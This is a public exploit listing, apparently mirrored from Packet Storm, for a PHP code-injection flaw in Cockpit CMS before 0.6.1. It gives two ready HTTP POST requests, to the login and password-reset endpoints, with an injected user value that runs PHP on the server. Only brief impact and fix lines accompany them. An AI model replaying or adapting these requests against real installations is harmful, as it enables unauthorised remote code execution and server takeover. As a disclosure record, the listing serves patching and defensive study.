Share
## https://sploitus.com/exploit?id=PACKETSTORM:160852
# Cockpit CMS 0.6.1 - Remote Code Execution  
# Product: Cockpit CMS (https://getcockpit.com)  
# Version: Cockpit CMS < 0.6.1  
# Vulnerability Type: PHP Code Execution  
# Exploit Author: Rafael Resende  
# Attack Type: Remote  
# Vulnerability Description  
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.  
  
# Exploit Login  
POST /auth/check HTTP/1.1  
Host: example.com  
User-Agent: Mozilla/5.0  
Content-Type: application/json; charset=UTF-8  
Content-Length: 52  
Origin: https://example.com  
  
{"auth":{"user":"test'.phpinfo().'","password":"b"}}  
  
# Exploit Password reset  
POST /auth/requestreset HTTP/1.1  
Host: example.com  
User-Agent: Mozilla/5.0  
Content-Type: application/json; charset=UTF-8  
Content-Length: 28  
Origin: https://example.com  
  
{"user":"test'.phpinfo().'"}  
  
## Impact  
Allows attackers to execute malicious codes to get access to the server.  
  
## Fix  
Update to versions >= 0.6.1